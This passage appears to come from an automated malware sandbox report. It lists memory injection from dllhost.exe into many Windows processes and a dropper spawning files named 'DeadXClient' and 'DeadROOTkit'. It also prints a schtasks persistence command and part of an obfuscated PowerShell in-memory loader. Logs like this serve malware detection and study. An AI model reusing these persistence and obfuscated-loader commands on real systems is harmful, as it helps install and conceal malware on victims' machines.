                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8660000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAE1050000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 37B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2D49ABF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C8D4DC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15E7EC90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 15D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1370000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2E50000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 7A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2CF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 14C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2F40000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 11E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2A10000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2580000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2DD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 8D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1190000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 22B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1100000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 980000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 900000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1140000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1020000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 590000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 810000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 770000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B80000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 25C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1260000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CE0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 610000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 840000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1220000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 910000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 7A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: A10000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D80000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 9C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1000000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 3040000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1220000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 760000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 670000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 12A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 390000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 430000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2240000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 3120000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: FA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2A60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1470000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 810000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadXClient.exe base: 1C560000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209CDA00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 17C9A4B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D056260000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EC87A30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 1120000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 11C0000
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\1.exe "C:\Users\user\AppData\Local\Temp\1.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe" Jump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:pwejfascjjdp{param([outputtype([type])][parameter(position=0)][type[]]$vaydtkuwaalxuu,[parameter(position=1)][type]$fbfuvfpkbf)$skuzedmhwuw=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+'e'+'f'+[char](108)+'e'+[char](99)+''+[char](116)+'ed'+[char](68)+''+'e'+''+[char](108)+''+'e'+''+'g'+''+[char](97)+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+'e'+'m'+'o'+''+'r'+''+[char](121)+''+'m'+''+'o'+'d'+'u'+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+'y'+[char](68)+'e'+[char](108)+''+[char](101)+''+'g'+'at'+'e'+'ty'+[char](112)+'e',''+[char](67)+''+'l'+'a'+[char](115)+'s,p'+[char](117)+'b'+[char](108)+''+[char](105)+'c'+[char](44)+''+'s'+''+[char](101)+''+'a'+''+[char](108)+''+'e'+''+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+''+'s'+''+[char](105)+''+[char](67)+''+'l'+'as'+[char](115)+''+[char](44)+''+[char](65)+'u'+[char](116)+''+[char](111)+''+'c'+''+'l'+''+[char](97)+'s'+[char](115)+'',[multicastdelegate]);$skuzedmhwuw.defineconstructor(''+[char](82)+''+[char](84)+''+[char](83)+''+[char](112)+''+[char](101)+''+[char](99)+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+'m'+[char](101)+',h'+[char](105)+''+[char](100)+''+[char](101)+'b'+'y'+''+[char](83)+''+[char](105)+'g'+[char](44)+''+'p'+'u'+[char](98)+'l'+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$vaydtkuwaalxuu).setimplementationflags(''+[char](82)+''+'u'+'n'+[char](116)+''+[char](105)+''+'m'+'e,'+[char](77)+''+[char](97)+''+[char](110)+''+'a'+''+[char](103)+'e'+'d'+'');$skuzedmhwuw.definemethod(''+'i'+''+[char](110)+''+[char](118)+''+[char](111)+''+[char](107)+''+'e'+'',''+'p'+''+[char](117)+''+[char](98)+'lic'+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+''+'g'+''+','+''+[char](78)+''+'e'+''+'w'+''+'s'+''+[char](108)+''+[char](111)+''+[char](116)+',v'+[char](105)+''+[char](114)+''+[char](116)+'u'+[char](97)+''+'l'+'',$fbfuvfpkbf,$vaydtkuwaalxuu).setimplementationflags(''+[char](82)+'u'+'n'+''+[char](116)+'im'+'e'+','+[char](77)+''+[char](97)+''+'n'+''+'a'+''+'g'+''+[char](101)+'d');write-output $skuzedmhwuw.createtype();}$mhgtxylbozoje=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+'y'+''+[char](115)+''+'t'+''+[char](101)+''+[char](109)+'.'+'d'+''+'l'+''+'l'+'')}).gettype('m'+[char](105)+''+'c'+''+[char](114)+'o'+[char](115)+'o'+[char](102)+''+[char](116)+'.w'+[char](105)+'n'+[char](51)+''+[char](50)+''+[char](46)+''+'u'+''+[char](110)+''+[char](115)+''+[char](97)+'fe'+[char](78)+''+'a'+''+'t'+'ive'+'m'+''+'e'+''+'t'+''+[char](104)+''+'o'+'d'+'s'+'');$mfociruxbuwivl=$mhgtxylbozoje.getmethod(''+'g'+''+[char](101)+''+[char](116)+''+[char](80)
                        Source: winlogon.exe, 00000013.00000000.2318423124.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000002.3486405591.000002D016A61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000017.00000000.2344128156.000001D154AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                        Source: dwm.exe, 00000017.00000000.2349182408.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000017.00000002.3527140898.000001D159439000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
